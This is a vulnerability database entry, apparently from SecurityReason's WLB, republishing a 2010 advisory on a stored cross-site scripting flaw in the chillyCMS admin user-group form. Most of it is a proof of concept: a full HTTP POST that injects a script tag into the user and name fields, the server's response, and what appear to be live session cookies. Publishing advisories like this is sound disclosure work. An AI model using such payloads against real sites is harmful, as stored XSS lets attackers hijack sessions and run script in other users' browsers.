|
 |
 Polski  Angielski |
| SecurityReason | ||
| WLB | ||
| Audyt | ||
| RSS | ||
| Zespół | ||
| Informacja | ||
Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu: |
||
Strona główna  Baza WLB |
||||||
 Autor : Pratulag Poziom ryzyka : Niski  (Szczegóły) Zdalny błąd : Tak Lokalny błąd : Nie Status : Bład Historia : [2010-03-17] Publikacja Podatne oprogramowanie : Chilly CMS
Tekst :  ======================================================================= chillyCMS Persistent XSS Vulnerability ======================================================================= # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software chillyCMS # Site p4ge http://www.opensourcecms.com/demo/2/292/chillyCMS/ # Category CMS / Portals # Plateform php # Proof of concept # Targeted URL: http://www.opensourcecms.com/demo/2/292/chillyCMS/admin/usergroups.site.php In ADD LINKS Field provide the malicious script to store in the Database. ======================================================================= Request - ======================================================================= POST /chillycms/admin/usersgroups.site.php HTTP/1.1 Host: demo.opensourcecms.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://demo.opensourcecms.com/chillycms/admin/userform.site.php Cookie: __utma=87180614.1562082400.1268211497.1268727582.1268736168.10; __utmz=87180614.1268727582.9.6.utmcsr=php.opensourcecms.com|utmccn=(referra l)|utmcmd=referral|utmcct=/scripts/details.php; __utmc=87180614; sid=c619059e8ecb02bfd5013f4cffe9f23f; PHPSESSID=d99927af4737c0c6df62d8f28bb1219a; CMSSESSID15baf25f=98ecec19a538065e285d7837054c7df9; ccc_lang=en; __utmb=87180614.6.10.1268736168; CCC_UID=c4ca4238a0b923820dcc509a6f75849b; CCC_CODE=7839a866ba37a8a0e8dbd669545b57d9 Content-Length: 154 user="><script>alert(123)</script>&name="><script>alert(123)</script>&pw=m aster&pw2=master&email=master%40yahoo.com&gids%5B%5D=2&status=1&language=en &getnewsletter=1&myaction=new&action=updateuser&id= ======================================================================= ======================================================================= Response- ======================================================================= HTTP/1.1 200 OK Date: Tue, 16 Mar 2010 11:53:11 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6337 Content-Type: text/html ======================================================================= After completion Just Refres the page and the malicious script get executed again and again. #If you have any questions, comments, or concerns, feel free to contact me. Referencje : None
Jeżeli chcesz zmienić powyższą note, prosze użyj UCP |
||||||
| Apache |  |
|
| PHP | |
|
| Patronat | ||
Szkolenia ISecMan
|
||
Szkolenia Multitrain
|
||
| Copyright © SecurityReason. All Rights Reserved. |